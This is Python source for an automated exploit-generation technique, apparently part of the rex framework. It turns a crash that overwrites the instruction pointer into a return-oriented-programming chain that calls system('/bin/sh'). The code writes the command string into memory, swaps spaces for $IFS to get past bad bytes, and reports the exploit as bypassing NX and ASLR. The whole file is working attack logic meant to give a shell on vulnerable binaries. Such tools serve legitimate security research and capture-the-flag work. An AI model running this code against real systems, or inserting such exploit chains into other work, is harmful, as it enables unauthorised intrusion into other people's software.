import logging

import claripy
from angrop.errors import RopException

from ...vulnerability import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique

l = logging.getLogger("rex.exploit.techniques.rop_to_system")


class RopToSystem(Technique):
    """Exploit an IP overwrite by ROP-calling ``system(cmd)``.

    The technique locates ``system``, makes sure a command string is present
    in memory (either already in the main binary or written there), builds a
    ROP call chain ``system(cmd_addr)`` and constrains the crash state so the
    chain is placed where the IP overwrite will use it.
    """

    name = "rop_to_system"
    applicable_to = ['unix']

    def find_system_addr(self):
        """Return the address of ``system``, or None when it cannot be found."""
        return self._find_func_address("system")

    def check(self):
        """Return True if this technique can plausibly be applied to the crash.

        Requirements: a ROP object is available, the crash is a (partial) IP
        overwrite, ``system`` can be located, and the crash state remains
        satisfiable with pc equal to the address of ``system``. On failure the
        reason is recorded via ``check_fail_reason`` and False is returned.
        """
        if self.rop is None:
            self.check_fail_reason("No ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # find the address of system
        system_addr = self.find_system_addr()
        if system_addr is None:
            self.check_fail_reason("The function system() could not be found in the binary.")
            return False

        # we should be able to call system in the first place
        state = self.crash.state
        if not state.satisfiable(extra_constraints=[state.regs.pc == system_addr]):
            self.check_fail_reason("The function system() could not be called: system @ %#x" % system_addr)
            return False

        return True

    def write_cmd_str(self, cmd_str):
        """Place ``cmd_str`` in memory and return ``(cmd_addr, cmd_constraint)``.

        Three strategies are tried in order: writing it with a ROP chain,
        using controlled global data, and reading it in by calling read/gets.

        :raises CannotExploit: if reading the string in fails, or if no
            strategy produced an address.
        """
        # method 1: try to write the cmd_str using ROP
        cmd_addr, cmd_constraint = self._write_with_ROP(cmd_str)
        if cmd_addr:
            return cmd_addr, cmd_constraint

        # method 2: if we control global data, put cmd there, done
        # (only the first candidate yielded is used)
        for cmd_addr, cmd_constraint in self._write_global_data(cmd_str):
            return cmd_addr, cmd_constraint

        # method 3: read in the cmd by calling read or gets
        try:
            cmd_addr, cmd_constraint = self._read_in_global_data(cmd_str)
        except CannotExploit as e:
            raise CannotExploit("[%s] cannot call read, %s" % (self.name, e)) from e
        if cmd_addr:
            return cmd_addr, cmd_constraint

        raise CannotExploit("[%s] cannot write in %s" % (self.name, cmd_str))

    def apply(self, cmd=b'/bin/sh', **kwargs):# pylint:disable=arguments-differ
        """Build an exploit that calls ``system(cmd)`` through a ROP chain.

        :param cmd: command bytes passed to ``system`` (default ``b'/bin/sh'``).
        :param kwargs: accepted for interface compatibility; unused here.
        :returns: an :class:`Exploit` wrapping the constrained crash.
        :raises CannotExploit: if ``system`` cannot be found, the command string
            cannot be placed in memory, the call chain cannot be crafted or
            inserted, or the final state is unsatisfiable.
        """
        # find the address of system
        system_addr = self.find_system_addr()
        if system_addr is None:
            raise CannotExploit("[%s] the function system could not be found in the binary" % self.name)

        # the NUL-terminated form is what we search for in the binary
        cmd_str = cmd + b'\x00'
        if 0x20 in self.crash._bad_bytes:
            # spaces are bad bytes: substitute the shell's field separator
            cmd_str = cmd_str.replace(b' ', b'$IFS')

        # look for cmd_str, usually "/bin/sh\x00", in the main object;
        # if it does not exist in the binary, write it to the memory
        main_object = self.crash.project.loader.main_object
        cmd_addr = next(main_object.memory.find(cmd_str), None)
        # compare with None explicitly: a match at offset 0 is still a match
        if cmd_addr is not None:
            # rebase the match by the object's mapped base
            cmd_addr += main_object.mapped_base

        # if writing the cmd to memory is necessary, don't use null byte
        # or it will cause some troubles in ropchain generation
        # NOTE(review): this re-encodes the original ``cmd``, so the $IFS
        # substitution above only affects the in-binary search unless
        # _encode_cmd also handles bad bytes -- confirm.
        cmd_str = self._encode_cmd(cmd)

        if cmd_addr is None:
            # write out cmd_str
            cmd_addr, cmd_constraint = self.write_cmd_str(cmd_str)
            # constrain the state so that cmd_str is present in memory at cmd_addr
            self.crash.state.add_constraints(cmd_constraint)

        # craft the caller chain
        try:
            chain = self.rop.func_call(system_addr, [cmd_addr])
        except RopException as e:
            raise CannotExploit("[%s] cannot craft caller chain" % self.name) from e

        # insert the chain into the binary
        try:
            chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state)
        except CannotExploit as e:
            raise CannotExploit("[%s] unable to insert chain" % self.name) from e

        # add the constraint to the state that the chain must exist at the address
        chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
        self.crash.state.add_constraints(chain_mem == claripy.BVV(chain.payload_str()))

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=True)
